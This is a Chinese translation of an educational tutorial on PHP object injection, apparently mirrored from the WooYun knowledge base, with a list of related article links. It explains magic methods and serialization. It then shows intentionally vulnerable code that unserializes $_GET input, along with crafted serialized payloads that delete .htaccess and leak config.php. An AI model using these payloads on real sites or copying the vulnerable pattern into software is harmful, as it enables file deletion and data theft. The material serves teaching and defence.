理解php物件注入

wyzsk發表於2020-08-19

PHP物件

作者：路人甲 · 2015/02/03 12:23

0x00 背景

原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/

php物件注入是一個非常常見的漏洞，這個型別的漏洞雖然有些難以利用，但仍舊非常危險，為了理解這個漏洞，請讀者具備基礎的php知識。

0x01 漏洞案例

如果你覺得這是個渣渣洞，那麼請看一眼這個列表，一些被審計狗挖到過該漏洞的系統，你可以發現都是一些耳熟能詳的玩意（就國外來說）

除此之外等等一堆系統，八成可能大概在這些還有其他的php程式中還有很多這種型別的漏洞，所以不妨考慮坐下喝杯咖啡並且試著去理解這篇文章。

0x01 PHP類和物件

類和變數是非常容易理解的php概念，打個比方，下面的程式碼在一個類中定義了一個變數和一個方法。

#!php
<?php

class TestClass
{
    // 一個變數

    public $variable = 'This is a string';

    // 一個簡單的方法

    public function PrintVariable()
    {
        echo $this->variable;
    }
}

// 建立一個物件

$object = new TestClass();

// 呼叫一個方法

$object->PrintVariable();

?>

它建立了一個物件並且呼叫了 PrintVariable 函式，該函式會輸出變數 variable。

如果想了解更多關於php物件導向程式設計的知識請點： http://php.net/manual/zh/language.oop5.php

0x02 php magic方法

php類可能會包含一些特殊的函式叫magic函式，magic函式命名是以符號“__”開頭的，比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。

這些函式在某些情況下會自動呼叫，比如:

__construct 當一個物件建立時呼叫 (constructor) __destruct 當一個物件被銷燬時呼叫 (destructor) __ toString當一個物件被當作一個字串使用

為了更好的理解magic方法是如何工作的，讓我們新增一個magic方法在我們的類中。

#!php
<?php

class TestClass
{
    // 一個變數

    public $variable = 'This is a string';

    // 一個簡單的方法

    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    // Constructor

    public function __construct()
    {
        echo '__construct <br />';
    }

    // Destructor

    public function __destruct()
    {
        echo '__destruct <br />';
    }

    // Call

    public function __toString()
    {
        return '__toString<br />';
    }
}

// 建立一個物件
//  __construct會被呼叫

$object = new TestClass();

// 建立一個方法
//  'This is a string’ 這玩意會被輸出

$object->PrintVariable();

// 物件被當作一個字串
//  __toString 會被呼叫

echo $object;

// End of PHP script
// php指令碼要結束了， __destruct會被呼叫

?>

我們往裡頭放了三個 magic方法，__construct, __destruct和 __toString，你可以看出來，__construct在物件建立時呼叫， __destruct在php指令碼結束時呼叫，__toString在物件被當作一個字串使用時呼叫。

這個指令碼會輸出這狗樣：

__construct 
This is a string 
__toString 
__destruct

這只是一個簡單的例子，如果你想了解更多有關magic函式的例子，請點選下面的連結：

http://php.net/manual/zh/language.oop5.magic.php

0x03 php物件序列化

php允許儲存一個物件方便以後重用，這個過程被稱為序列化，打個比方，你可以儲存一個包含著使用者資訊的物件方便等等重用。

為了序列化一個物件，你需要呼叫 “serialize”函式，函式會返回一個字串，當你需要用到這個物件的時候可以使用“unserialize”去重建物件。

讓我們在序列化丟進那個例子，看看序列化張什麼樣。

#!php
<?php

// 某類

class User
{
    // 類資料

    public $age = 0;
    public $name = '';

    // 輸出資料

    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age
             . ' years old. <br />';
    }
}

// 建立一個物件

$usr = new User();

// 設定資料

$usr->age = 20;
$usr->name = 'John';

// 輸出資料

$usr->PrintData();

// 輸出序列化之後的資料

echo serialize($usr);

?>

它會輸出

User John is 20 years old. 
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

你可以看到序列化之後的資料中有 20和John，其中沒有任何跟類有關的東西，只有其中的資料被資料化。

為了使用這個物件，我們用unserialize重建物件。

#!php
<?php

// 某類

class User
{
    // Class data

    public $age = 0;
    public $name = '';

    // Print data

    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 重建物件

$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

// 呼叫PrintData 輸出資料

$usr->PrintData();

?>

著會輸出

User John is 20 years old

0x04 序列化magic函式

magic函式constructor (__construct)和 destructor (__destruct) 是會在物件建立或者銷燬時自動呼叫，其他的一些magic函式會在serialize 或者 unserialize的時候被呼叫。

__sleep magic方法在一個物件被序列化的時候呼叫。 __wakeup magic方法在一個物件被反序列化的時候呼叫。

注意 __sleep 必須返回一個陣列與序列化的變數名。

#!php
<?php

class Test
{
    public $variable = 'BUZZ';
    public $variable2 = 'OTHER';

    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    public function __construct()
    {
        echo '__construct<br />';
    }

    public function __destruct()
    {
        echo '__destruct<br />';
    }

    public function __wakeup()
    {
        echo '__wakeup<br />';
    }

    public function __sleep()
    {
        echo '__sleep<br />';

        return array('variable', 'variable2');
    }
}

// 建立一個物件，會呼叫 __construct

$obj = new Test();

// 序列化一個物件，會呼叫 __sleep

$serialized = serialize($obj);

//輸出序列化後的字串

print 'Serialized: ' . $serialized . <br />';

// 重建物件，會呼叫 __wakeup

$obj2 = unserialize($serialized);

//呼叫 PintVariable, 會輸出資料 (BUZZ)

$obj2->PrintVariable();

// php指令碼結束，會呼叫 __destruct 

?>

這玩意會輸出：

__construct 
__sleep 
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} 
__wakeup 
BUZZ 
__destruct 
__destruct

你可以看到，我們建立了一個物件，序列化了它（然後__sleep被呼叫），之後用序列化物件重建後的物件建立了另一個物件，接著php指令碼結束的時候兩個物件的__destruct都會被呼叫。

更多相關的內容

http://php.net/manual/zh/language.oop5.serialization.php

0x05 php物件注入

現在我們理解了序列化是如何工作的，我們該如何利用它？事實上，利用這玩意的可能性有很多種，關鍵取決於應用程式的流程與，可用的類，與magic函式。

記住序列化物件的值是可控的。

你可能會找到一套web程式的原始碼，其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函式會影響到web程式。

打個比方，我們可能會找到一個類用於臨時將日誌儲存進某個檔案，當__destruct被呼叫時，日誌檔案會被刪除。然後程式碼張這狗樣。

#!php
<?php 

class LogFile
{
    // log檔名

    public $filename = 'error.log';

    // 某程式碼，儲存日誌進檔案

    public function LogData($text)
    {
        echo 'Log some data: ' . $text . '<br />';
        file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // Destructor 刪除日誌檔案

    public function __destruct()
    {
        echo '__destruct deletes "' . $this->filename . '" file. <br />';
        unlink(dirname(__FILE__) . '/' . $this->filename);
    }
}

?>

某例子關於如何使用這個類

#!php
<?php

include 'logfile.php';

// 建立一個物件

$obj = new LogFile();

// 設定檔名和要儲存的日誌資料

$obj->filename = 'somefile.log';
$obj->LogData('Test');

// php指令碼結束啦，__destruct被呼叫，somefile.log檔案被刪除。

?>

在其他的指令碼，我們可能又恰好找到一個呼叫“unserialize”函式的，並且恰好變數是使用者可控的，又恰好是$_GET之類的什麼玩意的。

#!php
<?php

include 'logfile.php';

// ... 一些狗日的程式碼和 LogFile 類 ...

// 簡單的類定義

class User
{
    // 類資料

    public $age = 0;
    public $name = '';

    // 輸出資料

    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 重建 使用者輸入的 資料

$usr = unserialize($_GET['usr_serialized']);

?>

你看，這個程式碼呼叫了 “LogClass” 類，並且有一個 “unserialize” 值是我們可以注入的。

所以構造類似這樣的東西：

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

究竟發生了什麼呢，因為輸入是可控的，所以我們可以構造任意的序列化物件，比如：

#!php
<?php

$obj = new LogFile();
$obj->filename = '.htaccess';

echo serialize($obj) . '<br />';

?>

這個會輸出

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} 
__destruct deletes ".htaccess" file.

現在我們將構造過後的序列化物件傳送給剛才的指令碼：

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

這會輸出

__destruct deletes ".htaccess" file.

現在 .htaccess 已經被幹掉了，因為指令碼結束時 __destruct會被呼叫。不過我們已經可以控制“LogFile”類的變數啦。

這就是漏洞名稱的由來：變數可控並且進行了unserialize操作的地方注入序列化物件，實現程式碼執行或者其他坑爹的行為。

雖然這不是一個很好的例子，不過我相信你可以理解這個概念，unserialize自動呼叫 __wakeup 和 __destruct，接著攻擊者可以控制類變數，並且攻擊web程式。

0x06 常見的注入點

先不談 __wakeup 和 __destruct，還有一些很常見的注入點允許你利用這個型別的漏洞，一切都是取決於程式邏輯。

打個比方，某使用者類定義了一個__toString為了讓應用程式能夠將類作為一個字串輸出（echo $obj） ,而且其他類也可能定義了一個類允許__toString讀取某個檔案。

#!php
<?php 

// … 一些include ...

class FileClass
{
    // 檔名

    public $filename = 'error.log';

    //當物件被作為一個字串會讀取這個檔案

    public function __toString()
    {
        return file_get_contents($this->filename);
    }
}

// Main User class

class User
{
    // Class data

    public $age = 0;
    public $name = '';

    // 允許物件作為一個字串輸出上面的data

    public function __toString()
    {
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 使用者可控

$obj = unserialize($_GET['usr_serialized']);

// 輸出 __toString

echo $obj;

?>

so,我們構造url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

再想想，如果我們用序列化呼叫 FileClass呢

我們建立利用程式碼

#!php
<?php

$fileobj = new FileClass();
$fileobj->filename = 'config.php';

echo serialize($fileobj);

?>

接著用生成的exp注入url

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

接著網頁會輸出 config.php的原始碼

#!php
<?php

$private_data = 'MAGIC';

?>

ps:我希望這讓你能夠理解。

0x07 其他的利用方法

可能其他的一些magic函式海存在利用點：比如__call 會在物件呼叫不存在的函式時呼叫，__get 和 __set會在物件嘗試訪問一些不存在的類，變數等等時呼叫。

不過需要注意的是，利用場景不限於magic函式，也有一些方式可以在一半的函式中利用這個漏洞，打個比方，一個模組可能定義了一個叫get的函式進行一些敏感的操作，比如訪問資料庫，這就可能造成sql注入，取決於函式本身的操作。

唯一的一個技術難點在於，注入的類必須在注入點所在的地方，不過一些模組或者指令碼會使用“autoload”的功能，具體可以在這裡瞭解

http://php.net/manual/zh/language.oop5.autoload.php

ps:去讀那狗屎的程式碼

0x08 如何利用或者避免這個漏洞

別在任何使用者可控的地方使用“unserialize”，可以考慮“json_decode“

0x09 結論

雖然很難找到而且很難利用，但是這真的真的很嚴重，可以導致各種各樣的漏洞。

本文章來源於烏雲知識庫，此映象為了方便大家學習研究，文章版權歸烏雲知識庫！

深入理解PHP物件注入
2016-04-09
PHP物件
WordPress < 3.6.1 PHP 物件注入漏洞
2020-08-19
PHP物件
PHP 依賴注入基礎理解
2018-01-20
PHP依賴注入
PHP phar：協議物件注入技術介紹
2018-08-31
PHP協議物件
php注入
2008-12-08
PHP
PHP 設計模式答疑-物件池與依賴注入的區別
2019-11-26
PHP設計模式物件依賴注入
PHP注入基礎
2017-11-17
PHP
PHP SQL防注入
2015-04-29
PHPSQL
php注入專題
2008-01-03
PHP
Spring（二）——注入物件
2018-02-14
Spring物件
技術分享 | 一種針對PHP物件注入漏洞的新型利用方法
2018-08-31
PHP物件
理解 Angular 依賴注入
2024-02-11
Angular依賴注入
PHP 執行注入分享
2017-10-10
PHP
另類PHP安全漏洞：利用弱型別和物件注入進行SQLi
2017-09-25
PHP型別物件SQL
php注入之完全版
2017-11-08
PHP
Joomla 物件注入漏洞分析報告
2020-08-19
OOM物件
Spring 依賴注入的理解
2016-10-04
Spring依賴注入
怎麼樣理解依賴注入?
2008-03-26
依賴注入
對於@Bean注入的新理解
2024-10-23
Bean
深入理解PHP物件導向之後期靜態繫結
2021-01-17
PHP物件
php操作mysql防止sql注入(合集)
2018-08-31
PHPMySql
PHP 依賴注入容器實現
2018-09-29
PHP依賴注入
php過濾提交資訊防注入
2011-08-05
PHP
PHP 物件迭代
2014-10-19
PHP物件
Js物件導向(1): 理解物件
2019-02-13
JS物件
前端理解依賴注入(控制反轉)
2019-09-08
前端依賴注入
理解設計模式及依賴注入
2020-11-28
設計模式依賴注入
spring使用註解注入bean理解
2017-05-19
SpringBean
理解Selection物件
2017-08-19
物件
PHP+MySQL 手工注入語句大全
2019-03-01
PHPMySql
PHP 依賴注入容器 Pimple 筆記
2017-03-28
PHP依賴注入筆記
PHP安全、Sql防注入安全彙總
2017-05-17
PHPSQL
PHP物件導向
2019-02-16
PHP物件
PHP 建立流式物件
2021-11-27
PHP物件
PHP-pfm 理解
2019-06-18
PHP
PHP引用的&理解
2021-09-09
PHP
DCI的Contex建立時注入request物件
2011-05-07
物件
PHP網站中整體防注入方法
2008-02-06
PHP網站